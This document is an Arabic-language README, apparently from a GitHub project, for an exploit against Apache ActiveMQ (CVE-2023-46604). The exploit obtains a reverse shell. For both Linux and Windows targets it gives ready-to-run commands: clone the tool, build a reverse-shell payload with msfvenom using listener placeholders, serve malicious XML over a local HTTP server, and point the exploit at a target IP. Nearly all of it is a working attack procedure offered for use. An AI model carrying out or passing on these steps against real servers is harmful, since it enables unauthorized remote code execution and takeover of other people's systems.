
تحقيق استغلال شل عكسية لأباتشي أكتيف إم كيو (CVE_2023-46604)
يستند هذا الاستغلال إلى العمل الأساسي المتاح على https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). لقد قمنا بتطوير التقنية بشكل أكبر لتحقيق شيلّة عكسية باستخدام إطار Metasploit (https://github.com/rapid7/metasploit-framework).
هام: قم بتغيير عنوان IP يدويًا (0.0.0.0 في السطر 11) في ملفات XML إلى عنوان IP حيث سيتم إنشاء الحمولة. إذا اتبعت الأوامر أدناه، فسيكون عنوان IP الخاص بالمستمع الخاص بك. أيضًا {IP_Of_Hosted_XML_File} سيكون عنوان IP الخاص بالمستمع الخاص بك.
لأهداف Linux/Unix
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
لأهداف Windows
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f exe -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml



شكر خاص لـ https://github.com/Anon4mous لدعمه المستمر لي.